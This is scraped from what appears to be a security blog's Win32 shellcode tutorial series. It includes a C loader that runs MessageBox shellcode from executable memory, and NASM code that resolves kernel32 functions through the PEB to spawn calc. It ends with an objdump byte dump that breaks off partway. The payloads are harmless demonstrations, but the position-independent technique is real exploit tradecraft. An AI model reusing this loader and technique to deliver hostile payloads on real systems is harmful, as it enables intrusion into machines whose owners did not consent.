<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdio.h>
#include <windows.h>
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">shellcode</span> <span class="o">=</span> \
<span class="s">"</span><span class="se">\x31\xc9\xf7\xe1\x64\x8b\x41\x30\x8b\x40</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x01\xde\x8b\x14\x8e\x01\xda\x89\xd5\x31</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xd2\x68\x6c\x6c\x61\x61\x66\x81\x6c\x24</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x02\x61\x61\x68\x33\x32\x2e\x64\x68\x55</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x73\x65\x72\x54\xff\xd0\x68\x6f\x78\x41</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x61\x66\x83\x6c\x24\x03\x61\x68\x61\x67</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xd5\x83\xc4\x10\x31\xd2\x31\xc9\x52\x68</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x50\x77\x6e\x64\x89\xe7\x52\x68\x59\x65</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x73\x73\x89\xe1\x52\x57\x51\x52\xff\xd0</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x83\xc4\x10\x68\x65\x73\x73\x61\x66\x83</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x6c\x24\x03\x61\x68\x50\x72\x6f\x63\x68</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x45\x78\x69\x74\x54\x53\xff\xd5\x31\xc9</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x51\xff\xd0</span><span class="s">"</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"shellcode length: %i"</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">shellcode</span><span class="p">));</span>
<span class="n">LPVOID</span> <span class="n">lpAlloc</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">4096</span><span class="p">,</span> <span class="n">MEM_COMMIT</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">lpAlloc</span><span class="p">,</span> <span class="n">shellcode</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">shellcode</span><span class="p">));</span>
<span class="p">((</span><span class="kt">void</span><span class="p">(</span><span class="o">*</span><span class="p">)())</span><span class="n">lpAlloc</span><span class="p">)();</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Compile it on Windows</p>
<pre><code class="language-dos">c:\MinGW\bin>gcc shellcode.c -o shellcode
</code></pre>
<p>Windows 7 (x86)
<img src="/assets/images/windows/x86/getmsg_0.gif" alt="" /><br /></p>
<p>and Windows 10 (x86)</p>
<p><img src="/assets/images/windows/x86/getmsg_1.gif" alt="" /><br /></p>
<p>The length is 223 bytes and is NULL free.<br />
<a href="https://blackcloud.me/Win32-shellcode-4/">In the next post</a> we will spawn a Reverse shell.</p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://nostarch.com/malware">This amazing book</a> help me a lot understand how Win32 kernel API works</li>
<li><a href="https://h0mbre.github.io/Babys-First-Shellcode/">The amazing h0mbre blog</a></li>
<li><a href="https://securitycafe.ro/2016/02/15/introduction-to-windows-shellcode-development-part-3/">Introduction to Windows Shellcode Development – Part 3</a> by <a href="https://twitter.com/NytroRST/">@NytroRST</a></li>
<li><a href="https://0xdarkvortex.dev/index.php/2019/03/18/windows-shellcoding-x86-hunting-kernel32-dll-part-1/">Windows Shellcoding x86 – Hunting Kernel32.dll – Part 1</a> by <a href="https://twitter.com/NinjaParanoid">@NinjaParanoid</a></li>
<li><a href="http://www.vividmachines.com/shellcode/shellcode.html#ws">Shellcoding for Linux and Windows Tutorial</a> by <a href="https://twitter.com/lestevehanna">Steve Hanna</a></li>
<li><a href="http://hick.org/code/skape/papers/win32-shellcode.pdf">A good paper book</a></li>
<li><a href="https://marcosvalle.github.io/re/exploit/2019/01/19/messagebox-shellcode.html">Windows x86 MessageBox shellcode</a> by <a href="https://twitter.com/_mvalle_">@MValle</a></li>
<li><a href="https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html">The PacketStorm Calc Shellcode</a></li>
<li><a href="https://github.com/bolonobolo/shellcode">My Github Win x86 shellcode repo</a></li>
</ul>{"name"=>nil, "avatar"=>"/assets/images/blackcloud3.png", "bio"=>"Made to broke things", "location"=>"noplace", "email"=>nil, "links"=>[{"label"=>"Email", "icon"=>"fas fa-fw fa-envelope-square", "url"=>"mailto:bolo@autistici.org"}, {"label"=>"Website", "icon"=>"fas fa-fw fa-link"}, {"label"=>"Twitter", "icon"=>"fab fa-fw fa-twitter-square", "url"=>"https://twitter.com/bolonobolo"}, {"label"=>"Facebook", "icon"=>"fab fa-fw fa-facebook-square"}, {"label"=>"GitHub", "icon"=>"fab fa-fw fa-github", "url"=>"https://github.com/bolonobolo"}, {"label"=>"Instagram", "icon"=>"fab fa-fw fa-instagram"}, {"label"=>"Hackthebox", "url"=>"https://www.hackthebox.eu/profile/8822", "icon"=>"fas fa-fw fa-link"}]}Win32 Shellcode - Spawn the Calc2019-11-11T00:00:00+00:002019-11-11T00:00:00+00:00https://blackcloud.me/Win32-shellcode-2<p><img src="/assets/images/shell.png" alt="" /><br /></p>
<h2 id="introduction">Introduction</h2>
<p><a href="https://blackcloud.me/Win32-shellcode-1/">In the last post</a> we built what we need to search function addresses in the memory. Now it’s time to find this addreses and use they to spawn the Calculator.
First we need to find the <code class="language-plaintext highlighter-rouge">GetProcAddress</code> function, this is the default function we will use to find all others function we need. The basic way to do that is to scroll through the entire array of function, comparing the name of the function we are searching with the name of every element of function array. So getting in deep with this problem we have to split the name <code class="language-plaintext highlighter-rouge">GetProcAddress</code> in 3 elements each of 4 bytes.</p>
<ul>
<li>0x50746547 = GetP</li>
<li>0x41636F72 = rocA</li>
<li>0x65726464 = ddre</li>
</ul>
<p>this 3 elements are enough to find our function. The concept is to load the <code class="language-plaintext highlighter-rouge">AddressOfNames</code> offset in EAX, add the BaseDll address of <code class="language-plaintext highlighter-rouge">Kerne32.dll</code> and start from this point to search our function, comparing the word in EAX with the first element. Once the first element fits, we add 4 bytes to EAX and compare the next element, and so on since we find the the iOrdinal of <code class="language-plaintext highlighter-rouge">GetProcAddress</code> abd save it in EDX register. At this point we can use the ordinal to obtain the <code class="language-plaintext highlighter-rouge">GetProcAddress</code> function pointer address</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nl">getProcAddress:</span>
<span class="nf">inc</span> <span class="nb">ecx</span> <span class="c1">; ordinals increment</span>
<span class="nf">lodsd</span> <span class="c1">; get "address of name" in eax</span>
<span class="nf">add</span> <span class="nb">eax</span><span class="p">,</span> <span class="nb">ebx</span>
<span class="nf">cmp</span> <span class="kt">dword</span> <span class="p">[</span><span class="nb">eax</span><span class="p">],</span> <span class="mh">0x50746547</span> <span class="c1">; GetP</span>
<span class="nf">jnz</span> <span class="nv">getProcAddress</span>
<span class="nf">cmp</span> <span class="kt">dword</span> <span class="p">[</span><span class="nb">eax</span> <span class="o">+</span> <span class="mh">0x4</span><span class="p">],</span> <span class="mh">0x41636F72</span> <span class="c1">; rocA</span>
<span class="nf">jnz</span> <span class="nv">getProcAddress</span>
<span class="nf">cmp</span> <span class="kt">dword</span> <span class="p">[</span><span class="nb">eax</span> <span class="o">+</span> <span class="mh">0x8</span><span class="p">],</span> <span class="mh">0x65726464</span> <span class="c1">; ddre</span>
<span class="nf">jnz</span> <span class="nv">getProcAddress</span>
<span class="nl">getProcAddressFunc:</span>
<span class="nf">mov</span> <span class="nb">esi</span><span class="p">,</span> <span class="p">[</span><span class="nb">edx</span> <span class="o">+</span> <span class="mh">0x24</span><span class="p">]</span> <span class="c1">; offset ordinals</span>
<span class="nf">add</span> <span class="nb">esi</span><span class="p">,</span> <span class="nb">ebx</span> <span class="c1">; pointer to the name ordinals table</span>
<span class="nf">mov</span> <span class="nb">cx</span><span class="p">,</span> <span class="p">[</span><span class="nb">esi</span> <span class="o">+</span> <span class="nb">ecx</span> <span class="o">*</span> <span class="mi">2</span><span class="p">]</span> <span class="c1">; CX = Number of function</span>
<span class="nf">dec</span> <span class="nb">ecx</span>
<span class="nf">mov</span> <span class="nb">esi</span><span class="p">,</span> <span class="p">[</span><span class="nb">edx</span> <span class="o">+</span> <span class="mh">0x1c</span><span class="p">]</span> <span class="c1">; ESI = Offset address table</span>
<span class="nf">add</span> <span class="nb">esi</span><span class="p">,</span> <span class="nb">ebx</span> <span class="c1">; we placed at the begin of AddressOfFunctions array</span>
<span class="nf">mov</span> <span class="nb">edx</span><span class="p">,</span> <span class="p">[</span><span class="nb">esi</span> <span class="o">+</span> <span class="nb">ecx</span> <span class="o">*</span> <span class="mi">4</span><span class="p">]</span> <span class="c1">; EDX = Pointer(offset)</span>
<span class="nf">add</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">ebx</span> <span class="c1">; EDX = getProcAddress</span>
<span class="nf">mov</span> <span class="nb">ebp</span><span class="p">,</span> <span class="nb">edx</span> <span class="c1">; save getProcAddress in EBP for future purpose</span>
</code></pre></div></div>
<p>Now we can user the <code class="language-plaintext highlighter-rouge">GetProcAddress</code> to find the other function needed: <code class="language-plaintext highlighter-rouge">CreateProcessA</code>.<br />
To do that we push the name of the new function on the stack and we call the <code class="language-plaintext highlighter-rouge">GetProcAddress</code> to save the <code class="language-plaintext highlighter-rouge">CreateProcessA</code> function pointer address in the EAX register.</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nl">getCreateProcessA:</span>
<span class="nf">xor</span> <span class="nb">ecx</span><span class="p">,</span> <span class="nb">ecx</span> <span class="c1">; zeroing ECX</span>
<span class="nf">push</span> <span class="mh">0x61614173</span> <span class="c1">; aaAs</span>
<span class="nf">sub</span> <span class="kt">word</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x2</span><span class="p">],</span> <span class="mh">0x6161</span> <span class="c1">; aaAs - aa</span>
<span class="nf">push</span> <span class="mh">0x7365636f</span> <span class="c1">; ecor</span>
<span class="nf">push</span> <span class="mh">0x72506574</span> <span class="c1">; rPet</span>
<span class="nf">push</span> <span class="mh">0x61657243</span> <span class="c1">; aerC</span>
<span class="nf">push</span> <span class="nb">esp</span> <span class="c1">; push the pointer to stack</span>
<span class="nf">push</span> <span class="nb">ebx</span>
<span class="nf">call</span> <span class="nb">edx</span> <span class="c1">; call getprocAddress</span>
</code></pre></div></div>
<p>Now we have to push the process to call in the stack. In this case, the ASCII string <code class="language-plaintext highlighter-rouge">calc</code>.
After that we can call the <code class="language-plaintext highlighter-rouge">CreateProcessA</code> to spawn our Calculator</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nl">getcalc:</span>
<span class="nf">push</span> <span class="mh">0x636c6163</span> <span class="c1">; 'calc'</span>
<span class="nf">mov</span> <span class="nb">ecx</span><span class="p">,</span> <span class="nb">esp</span> <span class="c1">; stack pointer to 'calc'</span>
<span class="c1">; Registers situation at this point</span>
<span class="c1">; EAX 75292062 kernel32.CreateProcessA</span>
<span class="c1">; ECX 0022FB7C ASCII "calc"</span>
<span class="c1">; EDX 75290000 kernel32.75290000</span>
<span class="c1">; EBX 75290000 kernel32.75290000</span>
<span class="c1">; ESP 0022FB7C ASCII "calc"</span>
<span class="c1">; EBP 0022FF94</span>
<span class="c1">; ESI 75344DD0 kernel32.75344DD0</span>
<span class="c1">; EDI 00000000</span>
<span class="c1">; EIP 00401088 get_calc.00401088</span>
<span class="nf">push</span> <span class="nb">ecx</span> <span class="c1">; processinfo pointing to 'calc' as a struct argument</span>
<span class="nf">push</span> <span class="nb">ecx</span> <span class="c1">; startupinfo pointing to 'calc' as a struct argument</span>
<span class="nf">xor</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">edx</span> <span class="c1">; zero out</span>
<span class="nf">push</span> <span class="nb">edx</span> <span class="c1">; NULLS</span>
<span class="nf">push</span> <span class="nb">edx</span>
<span class="nf">push</span> <span class="nb">edx</span>
<span class="nf">push</span> <span class="nb">edx</span>
<span class="nf">push</span> <span class="nb">edx</span>
<span class="nf">push</span> <span class="nb">edx</span>
<span class="nf">push</span> <span class="nb">ecx</span> <span class="c1">; 'calc'</span>
<span class="nf">push</span> <span class="nb">edx</span>
<span class="nf">call</span> <span class="nb">eax</span> <span class="c1">; call CreateProcessA and spawn calc </span>
</code></pre></div></div>
<p>Last but not least, we have to exit the process in the same way we founf the <code class="language-plaintext highlighter-rouge">CreateProcessA</code> we can found the <code class="language-plaintext highlighter-rouge">ExitProcess</code> and use it to exit gently.</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nl">getExitProcess:</span>
<span class="nf">add</span> <span class="nb">esp</span><span class="p">,</span> <span class="mh">0x010</span> <span class="c1">; clean the stack</span>
<span class="nf">push</span> <span class="mh">0x61737365</span> <span class="c1">; asse</span>
<span class="nf">sub</span> <span class="kt">word</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x3</span><span class="p">],</span> <span class="mh">0x61</span> <span class="c1">; asse -a </span>
<span class="nf">push</span> <span class="mh">0x636F7250</span> <span class="c1">; corP</span>
<span class="nf">push</span> <span class="mh">0x74697845</span> <span class="c1">; tixE</span>
<span class="nf">push</span> <span class="nb">esp</span>
<span class="nf">push</span> <span class="nb">ebx</span>
<span class="nf">call</span> <span class="nb">ebp</span>
<span class="nf">xor</span> <span class="nb">ecx</span><span class="p">,</span> <span class="nb">ecx</span>
<span class="nf">push</span> <span class="nb">ecx</span>
<span class="nf">call</span> <span class="nb">eax</span>
</code></pre></div></div>
<h2 id="the-shellcode">The Shellcode</h2>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">global</span> <span class="nv">_start</span>
<span class="nf">section</span> <span class="nv">.text</span>
<span class="nl">_start:</span>
<span class="nl">getkernel32:</span>
<span class="nf">xor</span> <span class="nb">ecx</span><span class="p">,</span> <span class="nb">ecx</span> <span class="c1">; zeroing register ECX</span>
<span class="nf">mul</span> <span class="nb">ecx</span> <span class="c1">; zeroing register EAX EDX</span>
<span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="p">[</span><span class="nb">fs</span><span class="p">:</span><span class="nb">ecx</span> <span class="o">+</span> <span class="mh">0x030</span><span class="p">]</span> <span class="c1">; PEB loaded in eax</span>
<span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="p">[</span><span class="nb">eax</span> <span class="o">+</span> <span class="mh">0x00c</span><span class="p">]</span> <span class="c1">; LDR loaded in eax</span>
<span class="nf">mov</span> <span class="nb">esi</span><span class="p">,</span> <span class="p">[</span><span class="nb">eax</span> <span class="o">+</span> <span class="mh">0x014</span><span class="p">]</span> <span class="c1">; InMemoryOrderModuleList loaded in esi</span>
<span class="nf">lodsd</span> <span class="c1">; program.exe address loaded in eax (1st module)</span>
<span class="nf">xchg</span> <span class="nb">esi</span><span class="p">,</span> <span class="nb">eax</span>
<span class="nf">lodsd</span> <span class="c1">; ntdll.dll address loaded (2nd module)</span>
<span class="nf">mov</span> <span class="nb">ebx</span><span class="p">,</span> <span class="p">[</span><span class="nb">eax</span> <span class="o">+</span> <span class="mh">0x10</span><span class="p">]</span> <span class="c1">; kernel32.dll address loaded in ebx (3rd module)</span>
<span class="c1">; EBX = base of kernel32.dll address</span>
<span class="nl">getAddressofName:</span>
<span class="nf">mov</span> <span class="nb">edx</span><span class="p">,</span> <span class="p">[</span><span class="nb">ebx</span> <span class="o">+</span> <span class="mh">0x3c</span><span class="p">]</span> <span class="c1">; load e_lfanew address in ebx</span>
<span class="nf">add</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">ebx</span>
<span class="nf">mov</span> <span class="nb">edx</span><span class="p">,</span> <span class="p">[</span><span class="nb">edx</span> <span class="o">+</span> <span class="mh">0x78</span><span class="p">]</span> <span class="c1">; load data directory</span>
<span class="nf">add</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">ebx</span>
<span class="nf">mov</span> <span class="nb">esi</span><span class="p">,</span> <span class="p">[</span><span class="nb">edx</span> <span class="o">+</span> <span class="mh">0x20</span><span class="p">]</span> <span class="c1">; load "address of name"</span>
<span class="nf">add</span> <span class="nb">esi</span><span class="p">,</span> <span class="nb">ebx</span>
<span class="nf">xor</span> <span class="nb">ecx</span><span class="p">,</span> <span class="nb">ecx</span>
<span class="c1">; ESI = RVAs</span>
<span class="nl">getProcAddress:</span>
<span class="nf">inc</span> <span class="nb">ecx</span> <span class="c1">; ordinals increment</span>
<span class="nf">lodsd</span> <span class="c1">; get "address of name" in eax</span>
<span class="nf">add</span> <span class="nb">eax</span><span class="p">,</span> <span class="nb">ebx</span>
<span class="nf">cmp</span> <span class="kt">dword</span> <span class="p">[</span><span class="nb">eax</span><span class="p">],</span> <span class="mh">0x50746547</span> <span class="c1">; GetP</span>
<span class="nf">jnz</span> <span class="nv">getProcAddress</span>
<span class="nf">cmp</span> <span class="kt">dword</span> <span class="p">[</span><span class="nb">eax</span> <span class="o">+</span> <span class="mh">0x4</span><span class="p">],</span> <span class="mh">0x41636F72</span> <span class="c1">; rocA</span>
<span class="nf">jnz</span> <span class="nv">getProcAddress</span>
<span class="nf">cmp</span> <span class="kt">dword</span> <span class="p">[</span><span class="nb">eax</span> <span class="o">+</span> <span class="mh">0x8</span><span class="p">],</span> <span class="mh">0x65726464</span> <span class="c1">; ddre</span>
<span class="nf">jnz</span> <span class="nv">getProcAddress</span>
<span class="nl">getProcAddressFunc:</span>
<span class="nf">mov</span> <span class="nb">esi</span><span class="p">,</span> <span class="p">[</span><span class="nb">edx</span> <span class="o">+</span> <span class="mh">0x24</span><span class="p">]</span> <span class="c1">; offset ordinals</span>
<span class="nf">add</span> <span class="nb">esi</span><span class="p">,</span> <span class="nb">ebx</span> <span class="c1">; pointer to the name ordinals table</span>
<span class="nf">mov</span> <span class="nb">cx</span><span class="p">,</span> <span class="p">[</span><span class="nb">esi</span> <span class="o">+</span> <span class="nb">ecx</span> <span class="o">*</span> <span class="mi">2</span><span class="p">]</span> <span class="c1">; CX = Number of function</span>
<span class="nf">dec</span> <span class="nb">ecx</span>
<span class="nf">mov</span> <span class="nb">esi</span><span class="p">,</span> <span class="p">[</span><span class="nb">edx</span> <span class="o">+</span> <span class="mh">0x1c</span><span class="p">]</span> <span class="c1">; ESI = Offset address table</span>
<span class="nf">add</span> <span class="nb">esi</span><span class="p">,</span> <span class="nb">ebx</span> <span class="c1">; we placed at the begin of AddressOfFunctions array</span>
<span class="nf">mov</span> <span class="nb">edx</span><span class="p">,</span> <span class="p">[</span><span class="nb">esi</span> <span class="o">+</span> <span class="nb">ecx</span> <span class="o">*</span> <span class="mi">4</span><span class="p">]</span> <span class="c1">; EDX = Pointer(offset)</span>
<span class="nf">add</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">ebx</span> <span class="c1">; EDX = getProcAddress</span>
<span class="nf">mov</span> <span class="nb">ebp</span><span class="p">,</span> <span class="nb">edx</span> <span class="c1">; save getProcAddress in EBP for future purpose</span>
<span class="nl">getCreateProcessA:</span>
<span class="nf">xor</span> <span class="nb">ecx</span><span class="p">,</span> <span class="nb">ecx</span> <span class="c1">; zeroing ECX</span>
<span class="nf">push</span> <span class="mh">0x61614173</span> <span class="c1">; aaAs</span>
<span class="nf">sub</span> <span class="kt">word</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x2</span><span class="p">],</span> <span class="mh">0x6161</span> <span class="c1">; aaAs - aa</span>
<span class="nf">push</span> <span class="mh">0x7365636f</span> <span class="c1">; ecor</span>
<span class="nf">push</span> <span class="mh">0x72506574</span> <span class="c1">; rPet</span>
<span class="nf">push</span> <span class="mh">0x61657243</span> <span class="c1">; aerC</span>
<span class="nf">push</span> <span class="nb">esp</span> <span class="c1">; push the pointer to stack</span>
<span class="nf">push</span> <span class="nb">ebx</span>
<span class="nf">call</span> <span class="nb">edx</span> <span class="c1">; call getprocAddress</span>
<span class="nl">zero_memory:</span>
<span class="nf">xor</span> <span class="nb">ecx</span><span class="p">,</span> <span class="nb">ecx</span> <span class="c1">; zero out counter register</span>
<span class="nf">mov</span> <span class="nb">cl</span><span class="p">,</span> <span class="mh">0xff</span> <span class="c1">; we'll loop 255 times (0xff)</span>
<span class="nf">xor</span> <span class="nb">edi</span><span class="p">,</span> <span class="nb">edi</span> <span class="c1">; edi now 0x00000000</span>
<span class="nl">zero_loop:</span>
<span class="nf">push</span> <span class="nb">edi</span> <span class="c1">; place 0x00000000 on stack 255 times </span>
<span class="nf">loop</span> <span class="nv">zero_loop</span> <span class="c1">; as a way to 'zero memory' </span>
<span class="nl">getcalc:</span>
<span class="nf">push</span> <span class="mh">0x636c6163</span> <span class="c1">; 'calc'</span>
<span class="nf">mov</span> <span class="nb">ecx</span><span class="p">,</span> <span class="nb">esp</span> <span class="c1">; stack pointer to 'calc'</span>
<span class="c1">; Registers situation at this point</span>
<span class="c1">; EAX 75292062 kernel32.CreateProcessA</span>
<span class="c1">; ECX 0022FB7C ASCII "calc"</span>
<span class="c1">; EDX 75290000 kernel32.75290000</span>
<span class="c1">; EBX 75290000 kernel32.75290000</span>
<span class="c1">; ESP 0022FB7C ASCII "calc"</span>
<span class="c1">; EBP 0022FF94</span>
<span class="c1">; ESI 75344DD0 kernel32.75344DD0</span>
<span class="c1">; EDI 00000000</span>
<span class="c1">; EIP 00401088 get_calc.00401088</span>
<span class="nf">push</span> <span class="nb">ecx</span> <span class="c1">; processinfo pointing to 'calc' as a struct argument</span>
<span class="nf">push</span> <span class="nb">ecx</span> <span class="c1">; startupinfo pointing to 'calc' as a struct argument</span>
<span class="nf">xor</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">edx</span> <span class="c1">; zero out</span>
<span class="nf">push</span> <span class="nb">edx</span> <span class="c1">; NULLS</span>
<span class="nf">push</span> <span class="nb">edx</span>
<span class="nf">push</span> <span class="nb">edx</span>
<span class="nf">push</span> <span class="nb">edx</span>
<span class="nf">push</span> <span class="nb">edx</span>
<span class="nf">push</span> <span class="nb">edx</span>
<span class="nf">push</span> <span class="nb">ecx</span> <span class="c1">; 'calc'</span>
<span class="nf">push</span> <span class="nb">edx</span>
<span class="nf">call</span> <span class="nb">eax</span> <span class="c1">; call CreateProcessA and spawn calc</span>
<span class="nl">getExitProcess:</span>
<span class="nf">add</span> <span class="nb">esp</span><span class="p">,</span> <span class="mh">0x010</span> <span class="c1">; clean the stack</span>
<span class="nf">push</span> <span class="mh">0x61737365</span> <span class="c1">; asse</span>
<span class="nf">sub</span> <span class="kt">word</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x3</span><span class="p">],</span> <span class="mh">0x61</span> <span class="c1">; asse -a </span>
<span class="nf">push</span> <span class="mh">0x636F7250</span> <span class="c1">; corP</span>
<span class="nf">push</span> <span class="mh">0x74697845</span> <span class="c1">; tixE</span>
<span class="nf">push</span> <span class="nb">esp</span>
<span class="nf">push</span> <span class="nb">ebx</span>
<span class="nf">call</span> <span class="nb">ebp</span>
<span class="nf">xor</span> <span class="nb">ecx</span><span class="p">,</span> <span class="nb">ecx</span>
<span class="nf">push</span> <span class="nb">ecx</span>
<span class="nf">call</span> <span class="nb">eax</span>
</code></pre></div></div>
<p>Compile it and test it</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@root:# nasm <span class="nt">-f</span> elf32 get_calc_shellcode.nasm <span class="p">;</span> ld <span class="nt">-melf_i386</span> <span class="nt">-o</span> get_calc_shellcode get_calc_shellcode.o
root@root:# objdump <span class="nt">-d</span> ./get_calc_shellcode|grep <span class="s1">'[0-9a-f]:'</span>|grep <span class="nt">-v</span> <span class="s1">'file'</span>|cut <span class="nt">-f2</span> <span class="nt">-d</span>:|cut <span class="nt">-f1-7</span> <span class="nt">-d</span><span class="s1">' '</span>|tr <span class="nt">-s</span> <span class="s1">' '</span>|tr <span class="s1">'\t'</span> <span class="s1">' '</span>|sed <span class="s1">'s/ $//g'</span>|sed <span class="s1">'s/ /\\x/g'</span>|paste <span class="nt">-d</span> <span class="s1">''</span> <span class="nt">-s</span> |sed <span class="s1">'s/^/"/'</span>|sed <span class="s1">'s/$/"/g'</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">c9</span><span class="se">\x</span><span class="s2">f7</span><span class="se">\x</span><span class="s2">e1</span><span class="se">\x</span><span class="s2">64</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">41"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">30</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">40</span><span class="se">\x</span><span class="s2">0c</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">70</span><span class="se">\x</span><span class="s2">14</span><span class="se">\x</span><span class="s2">ad</span><span class="se">\x</span><span class="s2">96</span><span class="se">\x</span><span class="s2">ad</span><span class="se">\x</span><span class="s2">8b"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">58</span><span class="se">\x</span><span class="s2">10</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">53</span><span class="se">\x</span><span class="s2">3c</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">da</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">78</span><span class="se">\x</span><span class="s2">01"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">da</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">de</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">c9</span><span class="se">\x</span><span class="s2">41</span><span class="se">\x</span><span class="s2">ad</span><span class="se">\x</span><span class="s2">01"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">d8</span><span class="se">\x</span><span class="s2">81</span><span class="se">\x</span><span class="s2">38</span><span class="se">\x</span><span class="s2">47</span><span class="se">\x</span><span class="s2">65</span><span class="se">\x</span><span class="s2">74</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">75</span><span class="se">\x</span><span class="s2">f4</span><span class="se">\x</span><span class="s2">81</span><span class="se">\x</span><span class="s2">78"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">0a</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">65</span><span class="se">\x</span><span class="s2">73</span><span class="se">\x</span><span class="s2">73</span><span class="se">\x</span><span class="s2">75</span><span class="se">\x</span><span class="s2">eb</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">24</span><span class="se">\x</span><span class="s2">01"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">de</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">0c</span><span class="se">\x</span><span class="s2">4e</span><span class="se">\x</span><span class="s2">49</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">1c</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">de"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">14</span><span class="se">\x</span><span class="s2">8e</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">da</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">d5</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">c9</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">73"</span>
